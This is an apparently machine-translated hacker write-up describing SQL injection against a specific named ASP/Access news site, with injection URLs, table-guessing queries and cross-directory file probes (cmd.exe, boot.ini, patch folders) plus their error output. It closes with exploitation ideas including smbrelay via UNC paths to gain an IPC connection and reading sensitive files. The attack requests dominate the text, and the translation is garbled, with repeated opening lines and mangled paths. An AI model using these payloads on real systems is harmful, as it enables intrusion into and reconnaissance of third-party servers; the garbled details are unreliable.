Preliminary Report on cross-file query vulnerability of access Database

I. I did not intend to find this vulnerability during a sqlinjection: 1. access www. lznet. netnewsdisplaynews. asp? Error message on the id24794 page: MicrosoftOLEDBProviderforODBCDrivers error 80040e14 [Microsoft] [ODBCMicrosoftAccessDriver] the syntax of the string is incorrect in

I. I accidentally found this vulnerability when I was playing SQL injection: 1. Access http://www.lznet.net/news/displaynews.asp? Id = 24794 page error message: Microsoft ole db Provider for ODBC Drivers error 80040e14 [Microsoft] [ODBC Microsoft Access Driver] the syntax of the string is incorrect in

I. I did not intend to find this one when I was playing SQL injection.Vulnerabilities:

1. Access http://www.lznet.net/news/displaynews.asp? Id = 24794'

Page error information:

Microsoft ole db Provider for ODBC Drivers error '80040e14'

[Microsoft] [ODBC Microsoft Access Driver] the syntax of the string is incorrect inQueryIn the expression 'id = 24794.

/News/displaynews. asp, row 133

2. Access http://www.lznet.net/news/displaynews.asp? Id = 24794 and 1 = 1

Page normal

3. Access http://www.lznet.net/news/displaynews.asp? Id = 24794 and 1 = 2

"Not Found" is returned on the page.File"

This is a typical SQL injection with accessVulnerabilitiesAnd then guess the table name:

4. Access http://www.lznet.net/news/displaynews.asp? Id = 24794 and 0 <> (select count (*) from news)

Page error:DatabaseThe engine cannot find the input table orQuery'News'

5. Access http://www.lznet.net/news/displaynews.asp? Id = 24794 and 0 <> (select count (*) from admin)

Page error:DatabaseThe engine cannot find the input table orQuery'Admin'

6. I suddenly remembered that the table name format in the error message obtained by SQL injection technology was news. id.

News is the table name and id is a column name in the table.

7. Access http://www.lznet.net/news/displaynews.asp? Id = 24794 and 0 <> (select count (*) from lznet.)

Error: cannot findFile'C: WINNTsystem32lznet. mdb '.

8. I tried the web root directory and all the virtual directories I knew, but I couldn't download this lznet. mdb.FileThe name is defined by yourself. But what causes the leakage of the physical path of the system directory? Can I try again?QueryC: cmd.exe under winntsystem32File.

9. Access http://www.lznet.net/news/displaynews.asp? Id = 24794 and 0 <> (select count (*) from cmd.exe.)

The format of this statement is obtained through multiple experiments :)

Error :"DatabaseEngine cannot be openedFile'C: WINNTsystem32CMD. EXE '. It has been opened exclusively by another user or has no permission to view data. "

Analytics uses the above error information. I think the right is limited, because we are the guestauthority Based on ASP, and cmd.exe is Everyone: R. If it cannot be openedDatabaseNo,FileThe folder can beDatabaseOtherwise, we cannot findFile.

10. Access http://www.lznet.net/news/displaynews.asp? Id = 24794 and 0 <> (select count (*) from c: cmd.exe.)

Here we can see cross-directoryQueryIs feasible

Error:

Not foundFile'C: cmd.exe '.

11. Access http://www.lznet.net/news/displaynews.asp? Id = 24794 and 0 <> (select count (*) from c: oot. ini.)

Note: boot. ini is the system boot of win2000 in the root directory of the system disk.File

Error:

Unable to open the Database EngineFile'C: oot. ini '. It has been opened exclusively by another user or has no permission to view data.

12. Access http://www.lznet.net/news/displaynews.asp? Id = 24794 and 0 <> (select count (*) from d: oot. ini.)

Cross-drive letterQueryIt is also feasible

Error:

Not foundFile'D: oot. ini '.

13. Access http://www.lznet.net/news/displaynews.asp? Id = 24794 and 0 <> (select count (*) from I: oot. ini.)

Error:

'I: oot. ini' is not a valid path. Check whether the path name is correctly spelled and whether it is connected.FileStorage server.

Note: The error message tells us honestly that the system does not have an I disk. The access error information is more detailed in some aspects.

14. This is a relatively practical use. If the other party calls spx from spx, these will be available in the winnt directory.File, We can use thisVulnerabilitiesFind theseFileTo confirm directory host patching:

[$ NtUninstallQ329553 $] [$ NtUninstallQ329834 $]

[$ NtUninstallQ331953 $] [$ ntuninstallq838533 $]

[$ NtUninstallQ811114 $] [$ NtUninstallQ811493 $]

[$ NtUninstallQ815021 $] [$ NtUninstallSP2SRP1 $]

...............

II.VulnerabilitiesUse ideas:

1.QueryA Dynamic WebpageFile, UseQueryStatement to obtain the source code of a dynamic web page, such as readingFileWrite the content to a column in the table, and then use len to guess the content in the column to obtain the source code.

2. Guess the directory location,FileName and so on. Learn about the host information of the other party, such as the partition on which the system is installed, Several partitions in total, and patches applied by the system.

3.QueryUnc path, such as \ 1.1.1.12.16a.vbs, and \ 1.1.1.1 is running smbrelay. We use smb redirection technology to obtain an ipc connection with the guest permission, which is much more interesting.

4. sensitive searchFileFor example, *. cif, *. mdb, etc., but I have not implemented the use of wildcards on access.QueryFile, Probably because I amDatabaseQuestions for new users.

5. ExecuteFileYou can make a fortune.

6. Some of the above ideas may have understood that the error is being verified (tell me what you think)

For thisVulnerabilitiesUnderstanding:

AccessQueryThere is a problem. If we construct a malformed table name, access cannot find such a table as mdb.FileTo search, if properly constructed, it will be treated asFileGo to the hard disk to find it! (It is searched under system32 by default. I also tested SQL server and did not find this problem. Use thisVulnerabilitiesTwo conditions are required (for fear that some people do not understand ):

(1) the other party is an asp + access application system, and asp code filtering is insufficient, so that we can remotely inject SQL statements.

(2) asp must be able to displayQueryDetails of the failure, such"DatabaseThe engine cannot find the input table orQuery'News '". OtherwiseQueryIt doesn't make sense to determine whether the operation is successful or not.